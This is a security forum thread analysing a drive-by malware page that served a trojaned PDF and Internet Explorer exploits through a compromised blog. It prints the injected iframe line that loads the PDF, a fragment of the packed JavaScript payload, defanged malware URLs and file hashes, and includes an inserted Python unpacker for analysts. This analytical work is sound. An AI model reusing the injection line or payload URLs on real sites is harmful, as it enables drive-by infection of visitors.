
Ender3rd
join:2001-07-15
Connecticut
·Frontier FiberOp..

Ender3rd

Member

Threat Detected: sitesupports.cn.kuzia.php


While browsing darkroastedblend(dot)com a friend of mine received a "threat detected" warning from "Web Shield". The inserted picture shows what he saw. I could find no information regarding "kuzia" or any details regarding the alleged JavaScript obfuscation. Does anyone know anything about what this is?

Thanks, Ender

Snowy
Lock him up!!!
Premium Member
join:2003-04-05
Kailua, HI

Snowy

Premium Member

I can't answer your question directly but in light of this similar thread
»Website owned? Or false positive?
can anyone say if this sort of thing could be mitigated by placing the entire .cn domain in the hosts file?

Ender3rd
join:2001-07-15
Connecticut
·Frontier FiberOp..

Ender3rd

Member

Thanks for the response. That was quite an interesting thread.

No doubt editing the hosts file would prevent any unwanted offsite image fills from *.cn or the execution of offsite scripts, but in this case the sitesupports(dot)cn website appears to be an "Apache HTTP Server Test Page" which seems unremarkable and without scripts of any kind. The only embedded links are to apache(dot)org and centos(dot)org and one informational link to internic(dot)net. Seems weird that his "Web Shield" protection freaked out over that.

In viewing the source I could not find anything embedded on the darkroastedblend site that looked threatening, but I am certainly not a security expert. Then again, I don't browse with IE or with JavaScript enabled or with ActiveX enabled...

:O)
Ender3rd

Ender3rd to Snowy

Member

to Snowy
said by Snowy:

can anyone say if this sort of thing could be mitigated by placing the entire .cn domain in the hosts file?
I looked into your idea of blocking a top level domain with the hosts file and found that the hosts file will not accept wildcards. From what I read, it can be handled at the DNS level, but I could find no easy method for dealing with this as an end user. Does anyone have any suggestions? I would not miss .cn at all if I could block it here.

VikingBob
Go Jets Go!
Premium Member
join:2004-06-05
MB Canada

VikingBob

Premium Member

OpenDNS will block TLDs. You have to sign up, though. In the settings, add ".cn" (without quotes) in the domains to block list. No * for a wildcard needed.
bobince
join:2002-04-19
DE

bobince to Ender3rd

Member

to Ender3rd
sitesupports.cn certainly does contain exploit code. The root URL may be a default placeholder page, but the URL AVG complained about (/kuzia.php) does try to launch a trojaned PDF:

document.write('<iframe src="cache/readme.pdf"></iframe>');
 

(it also attempts to load a Flash file, but that's not present on the server, currently.)

I couldn't find any link to this attack on darkroastedblend.com. Either it's been fixed for now, or it doesn't always show up, or the compromise was in a random advert shown by one of the site's ad networks.

As for blocking .cn, it may help as a temporary measure if you're sure you'll never need to look at any Chinese sites. It's far from watertight of course; in particular many of the current round of Chinese sploits are being referenced by direct IP address instead of hostname.
mysec
Premium Member
join:2005-11-29


mysec

Premium Member

Very interesting site to study. Different things happen depending on the browser.

Using IE6 unpatched on Win2K, several exploits attempt to run, including MS06-014 (MDAC):




Kaspersky identifies load.exe as Trojan.Win32.Inject.rlh.

Also MS08-041 (Snapshot Viewer) but I don't have MSAccess installed, so the exploit attempts to find my Office Setup Disk and use an installer (msi*.tmp):




Note that these are old exploits already patched, yet they must still be effective or they wouldn't continue to be used.

Some of the obfuscated page code. The first 'setAttribute' is for the MS06-014 exploit, and the 'snapshot' code is below.




That code did not load when I accessed the page using Opera.

According to some analysts, garbling the code makes it more difficult for AV to identify the page as malware code.

The PDF file exploit would not execute on my old version 6 of Acrobat Reader. The file is identified by Sophos as

Troj/PDFJs-L
Type: Trojan

Another "feature" of this site is the evasive techniques used to avoid multiple connections to the site by the same IP address.

The second time I connected brought up a blank page with this code:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1251"></HEAD>
<BODY></BODY></HTML>
 



This technique was analyzed a couple of years ago in this article:

Report Reveals New Genre of Evasive Attacks
»www.finjan.com/Pressrele ··· 30&lan=3
In order to minimize the malicious code's window of exposure, evasive attacks keep track of the actual IP addresses of visitors to a particular website or web page. Using this information, the attackers restrict exposure to the malicious code to a single view from each unique IP address. This means that the second time a given IP address tries to access the malicious page, a benign page will be automatically displayed in its place. All traces of the initial malicious page completely disappear.

"Evasive attack techniques where malicious code is controlled per IP address, country of origin or number of visits provide hackers with the ability to minimize the malicious code’s exposure, thereby reducing the likelihood of detection. Moreover, evasive attacks can identify the IP addresses of crawlers used by URL filtering, reputation services and search engines, replying to these engines with legitimate content and increasing the chances of mistakenly being classified by them as a legitimate category," said Yuval Ben-Itzhak, CTO, Finjan. "The combination of these evasive attacks with code obfuscation techniques significantly enhances the capability of sophisticated hackers to go undetected."

Hacking for Dollar$ - The Financial Affiliations Behind Modern Website Attacks

Driven by strong financial incentives and using widely available malicious code software packages, "affiliations" are being created that promote infections using a "hosted" model for the malicious code.

This applies to the current exploit:
In this scheme, the malicious code is usually located on a dedicated malicious code server (or a site that has been hacked to host the malicious code), [sitesupports.cn.kuzia]

while the participants in the affiliation insert a reference to the malicious code in various websites. [darkroastedblend.com]
[my insertions]
The website owners are paid according to the number of infected visitors to the site. Finjan’s findings attest to the growing magnitude of these affiliation networks, which have been used to compromise highly popular websites and even government domains.

This was written in 2007. Not much has changed!

EDIT: correct a statement

----
rich

therube
join:2004-11-11
Randallstown, MD

therube to Snowy

Member

to Snowy
Similar indeed. Look what Metabolic posted:
quote:
Hi, today I met with this page and I suggest there are two files. One uses an Adobe Acrobat Reader bug to install malware on the computer; the other is a Flash virus.
This is the pdf:
hxxp://liteautorepair.cn/cache/readme.pdf
This is the swf:
hxxp://liteautorepair.cn/cache/flash.swf

The page checks which plugin is installed ...

Different domains doing the hosting, but the same (named) payload.

(At the least) readme.pdf from liteautorepair is still available. Contains JavaScript code.
/JS (eval\(function\(p,a,c,k,e,d\){e=function\(c\){return\(c<a?'':e\(parseInt\(c/a\)\)\)+\(\(c=c%a\)>35?String.fromCharCode\(c+29\):c.toString\(36\)\)} ...
 
Points to MCRC Blog - 2009 - PACKED - The Elegant way to serve malware (which may have been linked in another thread here, or at least I remember the name finjan).

(LOL. It was this thread that I read "finjan". Like mysec's post above.)

(The kuzia pdf/swf files were not available to me. Either not there or being [IP?] blocked?)

Also worth reviewing: the first linked thread, including bobince's replies.

Also good IMO that at least some A/Vs (AVG in the first instance) are pointing out potential problems with sites containing malware.
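The `eval(function(p,a,c,k,e,d){...}(...))` wrapper therube found inside readme.pdf is the widely used JavaScript "packer" (the one the MCRC "PACKED" post covers): the script is reduced to short base-62 tokens plus a `|`-separated dictionary, and the wrapper rebuilds it in the browser. The unpacker below is an added example, not code from the thread, the PDF or the MCRC post; it reproduces the wrapper's own decoding loop in Python so an analyst can read such a script without executing it. The `SAMPLE` blob is constructed around a harmless one-liner; the PDF's real payload is not reproduced.

```python
import re

# Alphabet the packer's e() helper uses for symbols below 36 (JS toString(36));
# symbols 36..61 become 'A'..'Z' via String.fromCharCode(c+29).
_DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

# Argument list the wrapper is called with: }('payload',base,count,'w1|w2'.split('|'),...
_ARGS_RE = re.compile(
    r"\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,"
    r"\s*'((?:[^'\\]|\\.)*)'\s*\.split\(\s*'\|'\s*\)",
    re.DOTALL,
)

def encode_symbol(index: int, base: int) -> str:
    """Reproduce e(c): the short token the packer substituted for word number `index`."""
    prefix = "" if index < base else encode_symbol(index // base, base)
    r = index % base
    return prefix + (chr(r + 29) if r > 35 else _DIGITS[r])

def _js_unescape(s: str) -> str:
    """Undo the backslash escaping inside the packer's single-quoted JS strings."""
    simple = {"n": "\n", "r": "\r", "t": "\t"}
    return re.sub(r"\\(.)", lambda m: simple.get(m.group(1), m.group(1)), s, flags=re.DOTALL)

def unpack(packed: str) -> str:
    """Return the original JavaScript hidden in one eval(function(p,a,c,k,e,d){...}(...)) blob."""
    m = _ARGS_RE.search(packed)
    if not m:
        raise ValueError("no p,a,c,k,e,d argument list found")
    payload = _js_unescape(m.group(1))
    base, count = int(m.group(2)), int(m.group(3))
    words = _js_unescape(m.group(4)).split("|")
    if len(words) < count:
        raise ValueError("dictionary shorter than the declared word count")
    # Same loop the wrapper runs in the browser: highest index first; an empty
    # dictionary slot means the token stands for itself and is left untouched.
    for index in range(count - 1, -1, -1):
        if words[index]:
            token = re.escape(encode_symbol(index, base))
            payload = re.sub(r"\b" + token + r"\b", lambda _m, w=words[index]: w, payload)
    return payload

# Constructed sample (not the PDF's real payload): the standard wrapper around a harmless one-liner.
SAMPLE = (
    "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))"
    "+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};"
    "while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}"
    "return p}('0 1=2;0 3=1+4;5.6(3);',62,7,'var|x|10|y|20|app|alert'.split('|'),0,{}))"
)
```

`unpack(SAMPLE)` yields `var x=10;var y=x+20;app.alert(y);`; for a real sample, feed it the `eval(...)` text extracted from the PDF's /JS stream (without the backslash escapes a grep listing adds) and inspect the result in a text editor rather than a browser.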
bobince
join:2002-04-19
DE

bobince to mysec

Member

to mysec
quote:
"document.write" is not supported by non-IE browsers.
On the contrary, it's an original JavaScript 1.0 feature, going back to Netscape 2.0 days and supported everywhere.

The page does use browser-sniffing (very common these days), but the version I got was targeted at ‘other browsers’ via plugins.

Ender3rd
join:2001-07-15
Connecticut
·Frontier FiberOp..

Ender3rd

Member

I appreciate all the information given in the thread. Would it be fair to say that [darkroastedblend] was a willing partner in this exploit, or is it more likely that they were the victim of an exploit that linked them to the sitesupports.cn scripts?

Also, when I view [sitesupports.cn] all I see is an "Apache 2 Test Page" that appears to be devoid of any script language in the source. I see no page at all if I append that with kuzia.php (viewing with firefox - scripts disabled) so is it fair to say that this particular exploit has been removed?

Thanks,

Ender
mysec
Premium Member
join:2005-11-29

mysec to bobince

Premium Member

to bobince

Re: Threat Detected: sitesupports.cn.kuzia.php

said by bobince:

quote:
"document.write" is not supported by non-IE browsers.
On the contrary, it's an original JavaScript 1.0 feature, going back to Netscape 2.0 days and supported everywhere.

Thanks for the correction. I noticed my mistake last evening in another thread when I got the download using Opera, and intended to correct it here, which I just did.

----
rich
mysec

mysec to Ender3rd

Premium Member

to Ender3rd
said by Ender3rd:

I appreciate all the information given in the thread. Would it be fair to say that [darkroastedblend] was a willing partner in this exploit, or is it more likely that they were the victim of an exploit that linked them to the sitesupports.cn scripts?

Probably the latter, since bobince noted that the script has been removed.
Also, when I view [sitesupports.cn] all I see is an "Apache 2 Test Page" that appears to be devoid of any script language in the source. I see no page at all if I append that with kuzia.php (viewing with firefox - scripts disabled) so is it fair to say that this particular exploit has been removed?

Remember to disconnect/reconnect between tries.

The page with .../kuzia.php still loads here in both Opera and IE6, with differences in the code as I noted previously.

----
rich

therube
join:2004-11-11
Randallstown, MD

therube to Ender3rd

Member

to Ender3rd
quote:
when I view [sitesupports.cn] all I see is an "Apache 2 Test Page"
Correct, because in all likelihood that is all that is there.

Now if you were to use h-ttp://sitesupports.cn/kuzia.php/, you would see the exploit page (at least the start of, & assuming your IP hasn't been blocked).

Wonder if view-source: (in Mozilla browsers) would avoid the IP block?
view-source:http://sitesupports.cn/kuzia.php/
 
mvdu
Premium Member
join:2003-07-28
Collegeville, PA

mvdu to Ender3rd

Premium Member

to Ender3rd
I just get a blank page when I go there now, with AntiVir not alerting. Only the first time I went to hxxp://sitesupports.cn/kuzia.php/ did I get the exploit page that AntiVir alerted on.

Ender3rd
join:2001-07-15
Connecticut

Ender3rd to mysec

Member

to mysec
Thanks again for the patient analysis. This was the first time I have seen a disappearing exploit after an initial page load. Very clever and evasive indeed.

Regards,

Ender

Marrach
@verizon.net

Marrach to Ender3rd

Anon

to Ender3rd
Just a little extra info-- for Firefox 2x users-- you may find that Firefox may have had a configuration file rewritten by this website/trojan. I only noticed it after my Kaspersky woke up and blocked the download attempt of the actual trojan, but Firefox had already been hijacked to attempt the download when it restarted. By then, Kaspersky blocked it-- but the browser kept trying to download.

So when I tried to close Firefox, I got a window asking if I wanted to "Cancel a Download"-- but I never saw the download window in the first place, and when I opened the Download window it was empty-- Firefox was trying to download the file-- and had been instructed NOT to let you see it. You've got to get rid of a file in the configuration that instructs Firefox to tap into sitesupports.cn when you start it up.

I got rid of it by overwriting the Application Data files for Mozilla in "Documents and Settings". Sorry I don't know which one it was. I just overwrote from my last Clean Ghost.

I don't know if the same thing can happen with Firefox 3x. That's my 2 cents.
mysec
Premium Member
join:2005-11-29

mysec to therube

Premium Member

to therube
said by therube:

Similar indeed. Look what Metabolic posted:
quote:
This is the pdf:
hxxp://liteautorepair.cn/cache/readme.pdf

Different domains doing the hosting, but the same (named) payload.

But the PDF files are different:

sitesupports.cn
MD5: 334a732f5d026b20eb24b860b3723833
FileSize: 9k
Sophos: Troj/PDFJs-L

Opening in Acrobat Reader:




liteautorepair.cn
MD5: d085506ba97322a0896580eb5a7beefb
FileSize: 16k
BitDefender: Exploit.PDF-JS.Gen

Opening in Acrobat Reader:




The PDF-JS trojans have been around awhile. Here is an analysis of an early one:

Analyzing a malicious pdf - Troj/PDFJs-A
»realsecurity.wordpress.c ··· pdfjs-a/
Now that we have the shellcode we can very easily find out what it's doing.
We now have a .exe as output.
hxxp://aolpound.com/z9QCkGo7/exe.php

I don't know which versions and which vulnerabilities in the Acrobat Reader these PDF files exploit, but I did not get an alert to a download, as I did from the IE exploits as shown in a previous post.

Nonetheless, I've never believed that an application should be depended upon to be a defense against malware executables, and that some type of execution prevention should be in place just in case.

Is your browser configured to open documents on the web in the browser? This can present a problem with remote code execution exploits, such as this.

I posted these screenshots in another thread, but they are applicable here.

If configured to open in the browser, as I have with IE6, the PDF file will load into the i-frame and run. This code is still active. No click required:

document.write('<iframe src="cache/readme.pdf"></iframe>'); 
 




In Opera I configure to prompt for a download:







In my view, this is the way that documents on the web should be treated. This way, the user is alerted if encountering something she/he didn't go looking for, rather than getting an automatic download.

----
rich